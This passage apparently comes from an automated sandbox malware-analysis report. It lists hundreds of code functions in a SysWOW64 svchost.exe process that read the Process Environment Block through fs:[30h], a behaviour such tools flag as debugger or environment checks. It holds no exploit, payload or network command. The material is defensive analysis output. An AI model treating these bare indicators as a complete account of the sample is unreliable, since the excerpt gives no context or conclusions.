                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]1_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
